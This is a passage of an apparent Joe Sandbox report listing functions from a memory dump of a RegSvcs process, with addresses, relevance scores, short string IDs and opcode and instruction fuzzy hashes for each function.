                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Hgq$Hgq
                                            • API String ID: 0-3391890871
                                            • Opcode ID: 979cff5f712b8830ccffc67a9b155d6a7cf93543079f63b7e03bb62c62f74347
                                            • Instruction ID: d8995ab782ffeb1ad21bde3f2561d79a8a27e98b129c4e3e9593025410089876
                                            • Opcode Fuzzy Hash: 979cff5f712b8830ccffc67a9b155d6a7cf93543079f63b7e03bb62c62f74347
                                            • Instruction Fuzzy Hash: 2DB1CD717056158FDB15DF28D848B2E7BEAEF8B211F08886AE446CB3A5DB34CC41D7A1
                                            Function 030387E9 Relevance: 2.8, Strings: 2, Instructions: 324COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'cq$4'cq
                                            • API String ID: 0-60795322
                                            • Opcode ID: e3466ad053f3fa9dc362f1238acab875273f8bb37afaef8a2a336962b47dc38b
                                            • Instruction ID: d82094296a57d3b7e9cee69707deaac2e29d73c77f948eba380c2a33ac2feb68
                                            • Opcode Fuzzy Hash: e3466ad053f3fa9dc362f1238acab875273f8bb37afaef8a2a336962b47dc38b
                                            • Instruction Fuzzy Hash: DCB15D713165028FDB59DB29C958B3D76DEEF86600F1884EAF512CF3A1EA28CC898751
                                            Function 03035C08 Relevance: 2.7, Strings: 2, Instructions: 229COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ,gq$,gq
                                            • API String ID: 0-2533611571
                                            • Opcode ID: 93ab38860c2e1338f0b145fac3701aac148fc8e771662beb7179da78d524597c
                                            • Instruction ID: 83c59a13475cb0aafa3fde93c0e7b9c05c9efb37da273ec1784d0868830bee15
                                            • Opcode Fuzzy Hash: 93ab38860c2e1338f0b145fac3701aac148fc8e771662beb7179da78d524597c
                                            • Instruction Fuzzy Hash: 4E819F35A025068FCB58DF69CC88A6EB7FAFF8B214B198569D406DB374D731E841CB90
                                            Function 03033428 Relevance: 2.6, Strings: 2, Instructions: 112COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Xgq$Xgq
                                            • API String ID: 0-2113765878
                                            • Opcode ID: 1d10faec3a237e318688c453c5d0528a99e057f0cfab5b21fa58d4014c20e8e2
                                            • Instruction ID: cc6e9b878d1eb6d250dfd409ece37d6afa7f198d5aff5dd417a075db397596a1
                                            • Opcode Fuzzy Hash: 1d10faec3a237e318688c453c5d0528a99e057f0cfab5b21fa58d4014c20e8e2
                                            • Instruction Fuzzy Hash: 79312779B023244BDF6ECA6A89D427EA9DEBFC6211F0844B9D806C7780DF74DC8447A1
                                            Function 03030C8F Relevance: 1.7, Strings: 1, Instructions: 403COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LRcq
                                            • API String ID: 0-4134321033
                                            • Opcode ID: 7df2ee51dae92d4f0fbf6da8274890decea9ed1a0d70aac30e35e9ef40c49e8e
                                            • Instruction ID: c1aabbf057a5f1d8c5ec23fd7a30daa846a9b0ddfc3e030d09d3500aa408fcfe
                                            • Opcode Fuzzy Hash: 7df2ee51dae92d4f0fbf6da8274890decea9ed1a0d70aac30e35e9ef40c49e8e
                                            • Instruction Fuzzy Hash: E322B274A00219CFCB54EF65ED84A9DBBB2FF88301F1085A9D809AB355DB346E85CF91
                                            Function 03030CA0 Relevance: 1.6, Strings: 1, Instructions: 395COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LRcq
                                            • API String ID: 0-4134321033
                                            • Opcode ID: f2a40ceefe8dde966f87756a7e082e16117d937f0224e698dfa9022c69b92dd1
                                            • Instruction ID: fa644f3cc21ca6982ebbbc070d06784903ccdfb95308201aaab874d10f2526e6
                                            • Opcode Fuzzy Hash: f2a40ceefe8dde966f87756a7e082e16117d937f0224e698dfa9022c69b92dd1
                                            • Instruction Fuzzy Hash: F422A274A00219CFCB54EF65ED84A9DBBB2FF88301F1085A9D809AB355DB346E85CF91
                                            Function 0303A650 Relevance: 1.4, Strings: 1, Instructions: 122COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (ocq
                                            • API String ID: 0-1855696158
                                            • Opcode ID: a15be2165f8b926936f0ccd3fb0f96429082ba329b76fd9e2069606ba80f8311
                                            • Instruction ID: 4f2611fdca2da330b9333143508d4f06e16cb9257a463bfff2a9e44e99d91f9d
                                            • Opcode Fuzzy Hash: a15be2165f8b926936f0ccd3fb0f96429082ba329b76fd9e2069606ba80f8311
                                            • Instruction Fuzzy Hash: 10410F357006489FCB08AB79D854AAEBBFABFCD221F1440A9D506D7395CE309C41CBA0
                                            Function 0303A818 Relevance: .4, Instructions: 407COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3f8efcba9f80ac1272136175d2ae9f502c36d9f3830fc35474ed8d3113618142
                                            • Instruction ID: 78ebabd6f17c0662ba108f65b4c6145e9450c295d4f4b65db67d842106614b17
                                            • Opcode Fuzzy Hash: 3f8efcba9f80ac1272136175d2ae9f502c36d9f3830fc35474ed8d3113618142
                                            • Instruction Fuzzy Hash: B1F12A75B116158FCB04CF6DC8849ADBBFAFF89310B1A8099E555AB362CB35EC81CB50
                                            Function 03037438 Relevance: .2, Instructions: 201COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 25de7ce9c60fcab81b346ef62ed85601111c1b4e5be78f94f8fa37345076f24e
                                            • Instruction ID: 335f15e1fb6286f9e0bfeea2e8b3a649b6dac07e41dad15c5dffe8da839a11f1
                                            • Opcode Fuzzy Hash: 25de7ce9c60fcab81b346ef62ed85601111c1b4e5be78f94f8fa37345076f24e
                                            • Instruction Fuzzy Hash: 28713D74741605CFDB59DF28C498AAD7BEDAF4AA01F1940A9E906CB3B1DB70DC41CBA0
                                            Function 0303CEC7 Relevance: .2, Instructions: 172COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9d34ad98a89b94766878b9cbfd029cb4e616e1cec968aadfd5d7bfe80acf5dd6
                                            • Instruction ID: 1a9619531a46086106109fec5653068cbd502f1d9d052c94a50802a176ba5c41
                                            • Opcode Fuzzy Hash: 9d34ad98a89b94766878b9cbfd029cb4e616e1cec968aadfd5d7bfe80acf5dd6
                                            • Instruction Fuzzy Hash: 1D5193B0025F469FC2283F20B1BC1AABBA5FF4F3277456D45E14E858299BB054D9CB21
                                            Function 0303CED8 Relevance: .2, Instructions: 167COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d2d850264833716917ffd11964bc4f185b2a2c133e8fc9accac1d86f2ed84f6b
                                            • Instruction ID: 34abc1d4e8b16f303d1285413befea10708595c50bc5e03c28f9fe2a4a246d01
                                            • Opcode Fuzzy Hash: d2d850264833716917ffd11964bc4f185b2a2c133e8fc9accac1d86f2ed84f6b
                                            • Instruction Fuzzy Hash: 94518FB0025F069F82283F30B1BC1AABBA5FF4F3277856D45E14E858299BB054D9CB21
                                            Function 0303CD10 Relevance: .1, Instructions: 137COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 117058b65550883494cdc2a7ca8dffa6cca99bbcfd967fda537efc2b6b2f58cc
                                            • Instruction ID: 4fe0514d3b35b9aaa18831c8885c7442b5db12dbff5610fb2d5d2df2d00910a9
                                            • Opcode Fuzzy Hash: 117058b65550883494cdc2a7ca8dffa6cca99bbcfd967fda537efc2b6b2f58cc
                                            • Instruction Fuzzy Hash: 53519574E01208DFDB54DFAAD58499DBBF2FF89310F248169E819AB364DB30A901CF50
                                            Function 03033908 Relevance: .1, Instructions: 134COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 27ef6d361e20797faa13c37a25b62496ae059d4860b7c0ac77bd4bf00f150827
                                            • Instruction ID: 6ac2f1a59f512d78af1a28aa12bee0a3a4582a3e007296bf2038be6252eb3afb
                                            • Opcode Fuzzy Hash: 27ef6d361e20797faa13c37a25b62496ae059d4860b7c0ac77bd4bf00f150827
                                            • Instruction Fuzzy Hash: 29519778E01208CFCB48DFA9D99499DBBB6FF8D301B209469E405AB324DB359C45CF50
                                            Function 03039A63 Relevance: .1, Instructions: 123COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5680b9eda4315f4172e67d05c5accec66795223d9665bdd6bab5c5e0b320f48d
                                            • Instruction ID: 425f8b34a8fc189a82c3e9efae3b606bbdd313bcd96c9a46e6e909b879886dd0
                                            • Opcode Fuzzy Hash: 5680b9eda4315f4172e67d05c5accec66795223d9665bdd6bab5c5e0b320f48d
                                            • Instruction Fuzzy Hash: A741AF31A05649DFCF15CFA8C844B9EBFFAEF4A310F048555E855AB291D3B4E950CBA0
                                            Function 03036730 Relevance: .1, Instructions: 111COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cf5fbadeadd3df349deb74b83ee322ee5aa1c452fc1b66fd83ae8170053b91c4
                                            • Instruction ID: e55c21028ba6ad775eb59f6c3471bcc1e2291ce0092f2b51368a4f5ff80e279b
                                            • Opcode Fuzzy Hash: cf5fbadeadd3df349deb74b83ee322ee5aa1c452fc1b66fd83ae8170053b91c4
                                            • Instruction Fuzzy Hash: BA41DF31A01248EFCB14CF64C884BABBBFAEB49310F08846AE4158B251D779DD85CBA1
                                            Function 03034DC8 Relevance: .1, Instructions: 101COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4f14a93e271966dcd7d3ca698054322b5b2cf9db18194c045ef1a81a33dbe9b0
                                            • Instruction ID: db55a58c1e3f707d71b74fbe730211f3e82bd5a4f22d3f147b85be0819b2ccd2
                                            • Opcode Fuzzy Hash: 4f14a93e271966dcd7d3ca698054322b5b2cf9db18194c045ef1a81a33dbe9b0
                                            • Instruction Fuzzy Hash: 9A31C57520510A9FCB05DFAAD844AAF3FAAFF4D211F044429F9158B294CB38CD61DBA0
                                            Function 030376E0 Relevance: .1, Instructions: 87COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f15bc2a87f7c1b3fda1669ebdf763522dafe20892da55cc3af411d96c9ca6630
                                            • Instruction ID: 4c84f8a1310814c1a1de23f646a0c6a40960d80e461e8086f628f233a8f6cda0
                                            • Opcode Fuzzy Hash: f15bc2a87f7c1b3fda1669ebdf763522dafe20892da55cc3af411d96c9ca6630
                                            • Instruction Fuzzy Hash: A72122793012044BEB259639C854A7F36CFAFCAF19F1880B9D506CB788EE25CC82D381
                                            Function 0303A809 Relevance: .1, Instructions: 85COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f3c5a33bb25c151055501b7d61995523b050a0c5872b8b1d931c80a46ddf1b23
                                            • Instruction ID: ab7445a714336a386c053c25011f5657b1e92cad1bac6fa5627604e9fd18ba0a
                                            • Opcode Fuzzy Hash: f3c5a33bb25c151055501b7d61995523b050a0c5872b8b1d931c80a46ddf1b23
                                            • Instruction Fuzzy Hash: 66312F71B005068FCB08DF69C884AAEB7F6FF89354B158159E555AB3A5CB34EC42CB90
                                            Function 03032060 Relevance: .1, Instructions: 77COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e78c31967d490fa64fa6c8219d83fe524dc6632c3b9fffa52282a9a456aedf7a
                                            • Instruction ID: 23e52c7f684f7fdd448d8b93ede7404dcd90d90262045c21c6a6651cea3ad290
                                            • Opcode Fuzzy Hash: e78c31967d490fa64fa6c8219d83fe524dc6632c3b9fffa52282a9a456aedf7a
                                            • Instruction Fuzzy Hash: 7E210230A002069FCB40CF24D9409AEB7BDEB9D220B10C859D9098B298EB30EE45CBD1
                                            Function 0303D11E Relevance: .1, Instructions: 75COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0c42c0c4eca9600974f0058fc28d5e8f3c8532b37b723f10114956990ea4d595
                                            • Instruction ID: c31c67481cf7062424986544144437422f2216fab9c2208b7f867aaccad600b1
                                            • Opcode Fuzzy Hash: 0c42c0c4eca9600974f0058fc28d5e8f3c8532b37b723f10114956990ea4d595
                                            • Instruction Fuzzy Hash: A721F231C11219DECB10EFE8E9546ECFBB4FF5A301F109629E81577254EB346A8ACB50
                                            Function 03035A70 Relevance: .1, Instructions: 74COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 113f2fb208532177f8bf04cb04b47dab5acefb84056d2b83e89f853e6b163a9e
                                            • Instruction ID: eb4f42600b268607c1d22751fc5519b91e03953facb63580db3b6e754b596c8c
                                            • Opcode Fuzzy Hash: 113f2fb208532177f8bf04cb04b47dab5acefb84056d2b83e89f853e6b163a9e
                                            • Instruction Fuzzy Hash: D521D5353019128FC729DA29C89452FB7AAFFCA661B084179E806DB3A4CF30DC02CBD0
                                            Function 0303215C Relevance: .1, Instructions: 71COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2b2e2c2383d34dbc1e5d547947f445e4b1c8c063117e691a241eef48598d7afe
                                            • Instruction ID: 9a3a50f1d745e20700a690cb971c920344ac4c01df61fb34853a4994ff976a45
                                            • Opcode Fuzzy Hash: 2b2e2c2383d34dbc1e5d547947f445e4b1c8c063117e691a241eef48598d7afe
                                            • Instruction Fuzzy Hash: D1215731E083599FCB02DBB8DC008DEFB74FF8A210B248797D515B7151E6311905C7A1
                                            Function 0303D218 Relevance: .1, Instructions: 68COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 95d3cdff5a20abaadfdebaf607e01328f57c97ebbeb8e466e02d07a302cc320b
                                            • Instruction ID: 02ad090cfe91548446ff4376e0c79fd4bc323a35b817c5b917903ce604b6b7a3
                                            • Opcode Fuzzy Hash: 95d3cdff5a20abaadfdebaf607e01328f57c97ebbeb8e466e02d07a302cc320b
                                            • Instruction Fuzzy Hash: 2D21E574D012088FCB18DFB5E851AEEBBB2FB8A300F109569D406733A4CB399946CF25
                                            Function 030339ED Relevance: .1, Instructions: 68COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 03542ef80f0355f85f90ba292bae7fc44fc0e3e58ce43342adc1eb81c530af0b
                                            • Instruction ID: 2d225eb020f163c440b465ec0cd23386cb9acbe9626f568be7f98f0a632acddb
                                            • Opcode Fuzzy Hash: 03542ef80f0355f85f90ba292bae7fc44fc0e3e58ce43342adc1eb81c530af0b
                                            • Instruction Fuzzy Hash: 29319678E11308CFCB44DFA9E99489DBBB2FF49301B2054A9E809AB324D735AD45CF40
                                            Function 03034DB9 Relevance: .1, Instructions: 66COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 056777eb26c22aa53f5d593745a0ed0bc11f2419f0f2679815ed46a9c4e71eb7
                                            • Instruction ID: 07f8b3f44f38332a29b0723ea2962e41da4ac9fba457de2d6f28284c9ef62f55
                                            • Opcode Fuzzy Hash: 056777eb26c22aa53f5d593745a0ed0bc11f2419f0f2679815ed46a9c4e71eb7
                                            • Instruction Fuzzy Hash: 5521273520610A9FCB05DFAAE844B6B3BEAFB49311F044429F8158F294CB78CD55CBE0
                                            Function 0303D228 Relevance: .1, Instructions: 64COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 61fa4a7f4397c12d20aa0d758efc262572ce37e8d422acf6c14184413d69ffb7
                                            • Instruction ID: e8808c7bd19121a0e6a0cfe20096e55ac9c907c827a0da8dc8a241ace635554a
                                            • Opcode Fuzzy Hash: 61fa4a7f4397c12d20aa0d758efc262572ce37e8d422acf6c14184413d69ffb7
                                            • Instruction Fuzzy Hash: 8421B6349012088FCB18DFB5D850AEEB7B6FB8A301F105569D405733A4DB79A945CE65
                                            Function 03031F08 Relevance: .1, Instructions: 57COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4e50da5d00a46ecee16881cbf7b071015d003e0de72999fb5f71c8bca37ccc34
                                            • Instruction ID: 00c8daef3739190c8f1b1438daa44056a2897a35dcfd35a3b09497c8148fddab
                                            • Opcode Fuzzy Hash: 4e50da5d00a46ecee16881cbf7b071015d003e0de72999fb5f71c8bca37ccc34
                                            • Instruction Fuzzy Hash: A72123B0C056098FCB15EFA8C8445EDBFF0FF4A300F14416AD845B7265EB311A85CBA1
                                            Function 03031F61 Relevance: .1, Instructions: 56COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 69d4660ebd3dcef141126857cb22a4ccb26363766943386f7d65bd432c9bf613
                                            • Instruction ID: 8f71f1f66f474b818ca01352edc1232f9018fc49492f6daffc6abe9473e5b996
                                            • Opcode Fuzzy Hash: 69d4660ebd3dcef141126857cb22a4ccb26363766943386f7d65bd432c9bf613
                                            • Instruction Fuzzy Hash: AE21B0B4D0160A8FCB44EFA9D9456EEBFF5FB4D301F10916AD805B2214EB345A85CFA1
                                            Function 03035607 Relevance: .1, Instructions: 52COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8fd0114acff67c999b698f079d361c83e3d344359e25f8db9eced1ed11e62fb5
                                            • Instruction ID: 6b9b364bb99377d70eb4de204629a76b6f85a446b4d482122e531e7ebe42ef2b
                                            • Opcode Fuzzy Hash: 8fd0114acff67c999b698f079d361c83e3d344359e25f8db9eced1ed11e62fb5
                                            • Instruction Fuzzy Hash: 5401F5727052056FCB06DE69DC10AEF7FEAEFDE661B18806AF514D7254CA31C805CBA1
                                            Function 03032010 Relevance: .0, Instructions: 25COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5e38dc33db8a4f811da743df09758a0416fe90f2e4e540204da9e1c1c7ff90b3
                                            • Instruction ID: 8722be8b1f809ba0cd5cdbfb1b3d6af45dea4933d8a6b976ab69ac4a4c885ac3
                                            • Opcode Fuzzy Hash: 5e38dc33db8a4f811da743df09758a0416fe90f2e4e540204da9e1c1c7ff90b3
                                            • Instruction Fuzzy Hash: 50E02636C1022B63CB00A6B4DC056DEBB38EF92260F448522E42032104FBB0260A82E0
                                            Function 03032020 Relevance: .0, Instructions: 19COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e9b2428e8b3af6d0aa396d44817d7acac4fd1571cf8b843e00c370384f77fc6e
                                            • Instruction ID: db8cfe9a5269b80211ebb607dba456c0403f579192cc5d7d749a334f38f8a52d
                                            • Opcode Fuzzy Hash: e9b2428e8b3af6d0aa396d44817d7acac4fd1571cf8b843e00c370384f77fc6e
                                            • Instruction Fuzzy Hash: F6D01231D2022B968B00A6A5DC044DEB739EE96261B544626D52437154EB70265986E1
                                            Function 03038258 Relevance: .0, Instructions: 18COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                            • Instruction ID: be61c7564f0274b5a4ff8ea262578031db98a7dcc7add80d0353e2e817f404a7
                                            • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                            • Instruction Fuzzy Hash: B5C0123324E1282AE624908EBC40AA7AB8CC2C22B4A2941B7F91CA3200A8429C8401A9
                                            Function 0303A70D Relevance: .0, Instructions: 16COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 87b1a2d94b8d7c39fea8dc6144bedd0cbe6dfc6a7a311b27066fcfb4984badeb
                                            • Instruction ID: 3f06f5df1cdc8c90ec357108c75fafa6e2296433983d88d2d0b9caa52ccbbe12
                                            • Opcode Fuzzy Hash: 87b1a2d94b8d7c39fea8dc6144bedd0cbe6dfc6a7a311b27066fcfb4984badeb
